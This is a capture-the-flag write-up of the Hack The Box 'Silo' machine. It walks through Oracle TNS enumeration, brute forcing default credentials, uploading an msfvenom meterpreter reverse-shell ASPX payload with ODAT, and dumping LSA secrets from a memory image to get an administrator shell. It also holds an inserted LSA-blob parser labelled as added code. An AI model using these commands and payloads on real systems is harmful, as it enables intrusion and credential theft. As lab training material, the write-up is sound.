Hack The Box - Silo
Introduction
Silo is a medium box rated 4.6. It’s very hard to get initial access, but the privilege escalation is easy.
Let’s just start enumerating the machine.
Enumeration
Nmap Scans
The first thing I do is a fast scan of all TCP ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo nmap -sS -v -p- 10.10.10.82
Initiating Ping Scan at 07:59
Scanning 10.10.10.82 [4 ports]
Completed Ping Scan at 07:59, 0.22s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:59
Scanning silo.htb (10.10.10.82) [65535 ports]
Completed SYN Stealth Scan at 08:10, 683.62s elapsed (65535 total ports)
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.12s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 684.01 seconds
Raw packets sent: 71689 (3.154MB) | Rcvd: 184034 (23.407MB)
On those open ports, I perform a deep scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo nmap -A 10.10.10.82 -p 80,135,139,445,1521,5985,47001,49000-50000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 08:11 CEST
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.12s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8m00s, deviation: 0s, median: 8m00s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-30T06:22:08
|_ start_date: 2021-08-30T06:05:51
TRACEROUTE (using port 49890/tcp)
HOP RTT ADDRESS
1 230.71 ms 10.10.16.1
2 230.93 ms silo.htb (10.10.10.82)
Nmap done: 1 IP address (1 host up) scanned in 153.46 seconds
I also tried running a script scan, but that wasn’t very helpful:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo nmap 10.10.10.82 -script vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 08:25 CEST
Nmap scan report for silo.htb (10.10.10.82)
---snip---
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 424.87 seconds
Enumeration Of The Services
The Nmap scan could not really determine the OS, but I’m sure that this is a Windows machine. In this section, I enumerate all the services that run on the open ports (except the Windows RPC ports).
Port 139 & 445
On these ports runs SMB. The first thing I try is to list the available shares without a password:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ smbclient -L //silo.htb/
Enter WORKGROUP\user's password:
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ smbmap -H silo.htb
[!] Authentication error on silo.htb
I tried it both with smbclient and smbmap, but neither of them worked. I need to find some credentials first.
Port 80, 5985 & 47001
It seems that only port 80 serves a website; on the other two ports I just get a 404 error. So I run some gobuster scans against each port to look for hidden directories and virtual hosts:
Port 80 directory scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster dir -u http://silo.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,log,txt
[+] Timeout: 10s
===============================================================
2021/08/30 07:59:36 Starting gobuster in directory enumeration mode
===============================================================
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
Progress: 100375 / 1102805 (9.10%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/08/30 08:21:24 Finished
===============================================================
No directories found. I aborted the scan at 10% because it took too long, and I am (99%) sure that there would be no more results if I ran the scan any longer. So I tried a vhost scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster vhost -u http://silo.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-host.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 08:28:37 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/08/30 08:51:04 Finished
===============================================================
Again no results. Next I tried port 5985:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster dir -u http://silo.htb:5985 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-5985.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:5985
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,log,txt,php
[+] Timeout: 10s
===============================================================
2021/08/30 08:21:38 Starting gobuster in directory enumeration mode
===============================================================
Progress: 40200 / 1102805 (3.65%)[ERROR] 2021/08/30 08:36:34 [!] Get "http://silo.htb:5985/top_nav.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:36:34 [!] Get "http://silo.htb:5985/robotics.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 44435 / 1102805 (4.03%)[ERROR] 2021/08/30 08:38:16 [!] Get "http://silo.htb:5985/Utility": read tcp 10.10.17.28:57022->10.10.10.82:5985: read: connection reset by peer
Progress: 44455 / 1102805 (4.03%)[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:5985/gifshuffle.log": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:5985/forgotpass.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:5985/1824.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 72485 / 1102805 (6.57%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/08/30 08:48:23 Finished
===============================================================
Virtual host scan of port 5985:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster vhost -u http://silo.htb:5985 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-host-5985.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:5985
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 08:49:15 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/08/30 09:13:34 Finished
===============================================================
No results; I continue with the next port (47001):
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster dir -u http://silo.htb:47001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-47001.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:47001
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,log,txt
[+] Timeout: 10s
===============================================================
2021/08/30 08:22:04 Starting gobuster in directory enumeration mode
===============================================================
Progress: 39475 / 1102805 (3.58%)[ERROR] 2021/08/30 08:36:34 [!] Get "http://silo.htb:47001/061.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 43765 / 1102805 (3.97%)[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:47001/puce.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:47001/dream": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 94665 / 1102805 (8.58%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/08/30 09:02:39 Finished
===============================================================
Virtual host scan of port 47001:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster vhost -u http://silo.htb:47001 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-host-47001.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:47001
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 09:03:58 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/08/30 09:25:14 Finished
===============================================================
The same here, no directories or vhosts found. So I tried another tool called dirsearch. Here is the output for all three ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://silo.htb/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/silo.htb/-_21-08-30_08-48-07.txt
Error Log: /tools/dirsearch/logs/errors-21-08-30_08-48-07.log
Target: http://silo.htb/
[08:48:07] Starting:
[08:48:23] 301 - 153B - /aspnet_client -> http://silo.htb/aspnet_client/
[08:48:34] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[08:48:34] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[08:48:34] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[08:48:34] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[08:48:34] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
Task Completed
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://silo.htb:5985/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/silo.htb-5985/-_21-08-30_09-05-30.txt
Error Log: /tools/dirsearch/logs/errors-21-08-30_09-05-30.log
Target: http://silo.htb:5985/
[09:05:30] Starting:
[09:06:17] 405 - 0B - /wsman
Task Completed
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://silo.htb:47001/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/silo.htb-47001/-_21-08-30_09-07-18.txt
Error Log: /tools/dirsearch/logs/errors-21-08-30_09-07-18.log
Target: http://silo.htb:47001/
[09:07:18] Starting:
Task Completed
There are two interesting things from these scans:
http://10.10.10.82/aspnet_client/
http://10.10.10.82:5985/wsman
The first URL returns a permission denied error, the second one just an empty page. I don’t think the web server will bring me any further.
Port 1521 & 49159
On these ports runs the Oracle TNS listener. One of them gives me the version: 11.2.0.2.0. I search for an exploit and find the ODAT tool (Oracle Database Attacking Tool):
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool (https://github.com/quentinhardy/odat)
Since 2016 it contains a module called tnspoison, which can exploit CVE-2012-1675. The tool can also be installed with this command: sudo apt install odat
Exploitation
I try the exploit found above:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb
11:27:38 CRITICAL -: The server SID or Service Name must be given with
the '-d SID' or '-n serviceName' option.
The SID can be found with this command:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ odat sidguesser -s silo.htb
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ################################### | ETA: 00:00:02
[+] 'XEXDB' is a valid SID. Continue...
100% |###################################################################################| Time: 00:05:12
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###################################################################################| Time: 00:00:10
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
There are two valid SIDs, XE and XEXDB. The port which is used by the service is the default port, so I do not need to specify the port:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb -d XE
11:31:48 CRITICAL -: An operation on this module must be chosen thanks to one of
these options: --test-module, --poison;
To test the module, I use the --test-module flag:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb -d XE --test-module
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
This means that the target is vulnerable, so I try to exploit it (--poison flag):
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb -d XE --poison
[1] (10.10.10.82:1521): Local proxy on port 1522 and TNS poisoning attack to 10.10.10.82:1521 are starting. Waiting for connections...
I waited a few minutes, but nothing happened. Then I found a Metasploit module that can brute force the login credentials. I know, I know, Metasploit and OSCP, but I think there is no other way around this (for my skill level). So I use the module:
msf6 > use admin/oracle/oracle_login
msf6 auxiliary(admin/oracle/oracle_login) > options
Module options (auxiliary/admin/oracle/oracle_login):
Name Current Setting Required Description
---- --------------- -------- -----------
CSVFILE /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv no The file that contains a list of default accounts.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.
msf6 auxiliary(admin/oracle/oracle_login) > set rhost silo.htb
rhost => silo.htb
msf6 auxiliary(admin/oracle/oracle_login) > set SID XE
SID => XE
Now, I just need to execute the module:
msf6 auxiliary(admin/oracle/oracle_login) > run
[*] Starting brute force on 10.10.10.82:1521...
[+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE
[*] Auxiliary module execution completed
There are the credentials. I noticed that these are one of the default credential pairs for the service.
To connect to the database, I use a tool made by Oracle for this purpose. It’s called sqlplus:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo apt install oracle-instantclient-sqlplus
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sqlplus scott/tiger@silo.htb:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Mon Aug 30 12:41:11 2021
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
The connection works. I check which privileges I have:
SQL> SELECT * FROM user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
Now, I return to ODAT and try all modules on the target:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo odat all -s silo.htb -d XE -U scott -P tiger
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the scott/tiger account
[2.1] UTL_HTTP library ?
[-] KO
[2.2] HTTPURITYPE library ?
12:45:49 WARNING -: Impossible to fetch all the rows of the query select
httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP
request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access
denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[2.3] UTL_FILE library ?
[-] KO
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[-] KO
[2.8] Hashed Oracle passwords ?
[-] KO
---snip---
The DBMS_XSLPROCESSOR library is enabled, which allows me to put files onto the machine. I first try a simple text file to check whether I could upload a reverse shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ cat hello.txt
Hello World
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ odat utlfile --putFile C:\\inetpub\\wwwroot\\ hello.txt /hackthebox/oscp-prep/silo/hello.txt -s silo.htb -p 1521 -U scott -P tiger -d XE --sysdba
[1] (10.10.10.82:1521): Put the /hackthebox/oscp-prep/silo/hello.txt local file in the C:\inetpub\wwwroot\ folder like hello.txt on the 10.10.10.82 server
[+] The /hackthebox/oscp-prep/silo/hello.txt file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the hello.txt file
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ curl silo.htb/hello.txt
Hello World
This worked, so I will generate a reverse shell. I already used metasploit for this box, so it does not matter if I use a meterpreter shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.28 LPORT=1337 -f aspx-exe -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx-exe file: 24259 bytes
Saved as: shell.aspx
I upload the shell the same way as the test file before:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ odat utlfile --putFile C:\\inetpub\\wwwroot\\ shell.aspx /hackthebox/oscp-prep/silo/shell.aspx -s silo.htb -p 1521 -U scott -P tiger -d XE --sysdba
[1] (10.10.10.82:1521): Put the /hackthebox/oscp-prep/silo/shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server
[+] The /hackthebox/oscp-prep/silo/shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file
Before curling the shell, I open a metasploit multi/handler:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.17.28
msf6 exploit(multi/handler) > set lport 1337
lport => 1337
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.17.28:1337
msf6 exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.17.28:1337
To trigger the reverse shell, I request the uploaded page with curl:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ curl http://silo.htb/shell.aspx
And I got the meterpreter shell:
[*] Started reverse TCP handler on 10.10.17.28:1337
[*] Sending stage (175174 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.17.28:1337 -> 10.10.10.82:49167)
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IIS APPPOOL\DefaultAppPool @ SILO 10.10.17.28:1337 -> 10.10.10.82:49167
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
A shell spawned as the IIS user.
User Flag
I can now get the user flag:
meterpreter > dir
Listing: c:\Users\Phineas\Desktop
=================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 300 fil 2018-01-05 23:53:19 +0100 Oracle issue.txt
100666/rw-rw-rw- 282 fil 2018-01-04 22:40:41 +0100 desktop.ini
100444/r--r--r-- 34 fil 2018-01-04 22:41:14 +0100 user.txt
meterpreter > cat user.txt
1f**************************8021
I was able to obtain the user flag.
Privilege Escalation
In the same directory is a file called Oracle issue.txt:
C:\Users\Phineas\Desktop>type "Oracle issue.txt"
type "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows/Oracle performance issue (full mem dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
£%Hm8646uC$
This is a full memory dump, which may contain a password. I download and extract the dump file. To analyze it, I use volatility3 and dump the LSA secrets with the lsadump plugin:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/volatility3/vol.py -f SILO-20180105-221806.dmp lsadump
---snip---
Key Secret Hex
DefaultPassword DoNotH@ckMeBro! 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00
DPAPI_SYSTEM ,Ï%14®C-¬ò§tmC¨¦©Bb÷UpH»}þyI½ 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00
So the password is DoNotH@ckMeBro! (the Hex column is the UTF-16LE encoding of exactly that string).
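To verify what Volatility decoded, here is a small parser for the LSA secret blob layout visible in the Hex column (a 4-byte length, a 12-byte header, the payload, then zero padding). This is an added example written for this write-up, not code from the original post, ODAT or Volatility; the sample rows are the two secrets above, and the 44-byte DPAPI_SYSTEM layout (version field plus key material) is taken from the documented secret format, not from the page. From a forensic point of view, a decodable DefaultPassword secret means the host has autologon credentials stored in LSA, which is exactly what an analyst should flag.

```python
import struct
from typing import List, NamedTuple, Optional, Tuple

# LSA_SECRET_BLOB layout (matches the Hex column printed by Volatility 3's
# lsadump for this dump):
#   offset 0   uint32 LE  length of the secret payload
#   offset 4   12 bytes   reserved/unknown header (all zero in both rows here)
#   offset 16  payload    'length' bytes, then zero padding to a 4-byte boundary
HEADER_SIZE = 16

# Secrets that Windows stores as UTF-16LE text rather than raw key material.
TEXT_SECRETS = {"DefaultPassword"}


class LsaSecret(NamedTuple):
    name: str
    length: int
    payload: bytes
    text: Optional[str]  # decoded string for text secrets, None for binary ones


def hex_column_to_bytes(hex_text: str) -> bytes:
    """Convert the space-separated 'Hex' column of the lsadump table to bytes."""
    return bytes.fromhex(hex_text.replace(" ", ""))


def parse_lsa_secret(name: str, blob: bytes) -> LsaSecret:
    """Parse one decrypted LSA secret blob and decode it if it is a text secret."""
    if len(blob) < HEADER_SIZE:
        raise ValueError(f"{name}: blob shorter than the 16-byte header")
    (length,) = struct.unpack_from("<I", blob, 0)
    payload = blob[HEADER_SIZE:HEADER_SIZE + length]
    if len(payload) != length:
        raise ValueError(f"{name}: declared length {length} exceeds blob size")
    trailer = blob[HEADER_SIZE + length:]
    if any(trailer):  # anything after the declared payload must be zero padding
        raise ValueError(f"{name}: non-zero bytes after the declared payload")
    text = None
    if name in TEXT_SECRETS:
        if length % 2:
            raise ValueError(f"{name}: odd length for a UTF-16LE string")
        text = payload.decode("utf-16-le")
    return LsaSecret(name, length, payload, text)


def dpapi_system_version(secret: LsaSecret) -> int:
    """DPAPI_SYSTEM payload = uint32 version followed by 40 bytes of key material."""
    if secret.name != "DPAPI_SYSTEM" or secret.length != 44:
        raise ValueError("not a 44-byte DPAPI_SYSTEM secret")
    return struct.unpack_from("<I", secret.payload, 0)[0]


def parse_lsadump_rows(rows: List[Tuple[str, str]]) -> List[LsaSecret]:
    """rows: (Key, Hex) pairs taken from the lsadump table."""
    return [parse_lsa_secret(key, hex_column_to_bytes(h)) for key, h in rows]


def default_password_from_rows(rows: List[Tuple[str, str]]) -> Optional[str]:
    """Return the autologon password if the dump contains a DefaultPassword secret."""
    for secret in parse_lsadump_rows(rows):
        if secret.name == "DefaultPassword":
            return secret.text
    return None


# Sample input: the two rows of the Volatility output above (Key and Hex columns).
SAMPLE_ROWS = [
    ("DefaultPassword",
     "1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 "
     "74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00"),
    ("DPAPI_SYSTEM",
     "2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 "
     "34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 "
     "55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00"),
]


if __name__ == "__main__":
    for s in parse_lsadump_rows(SAMPLE_ROWS):
        shown = repr(s.text) if s.text is not None else f"{s.length} bytes of binary data"
        print(f"{s.name}: {shown}")
```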
With the tool winexe, I can spawn a shell as administrator:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ winexe -U Administrator //silo.htb cmd.exe
Enter password: DoNotH@ckMeBro!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
silo\administrator
C:\Windows\system32>
And a shell as administrator spawns. The password was correct.
Root Flag
It’s time to gather the root flag:
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 69B2-6341
Directory of C:\Users\Administrator\Desktop
01/07/2018 02:34 PM <DIR> .
01/07/2018 02:34 PM <DIR> ..
08/30/2021 07:06 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,339,597,824 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cb**************************4f73
Conclusions
This was a fun box and I learned a lot, especially about using ODAT. The box helped me a lot to pass the OSCP exam.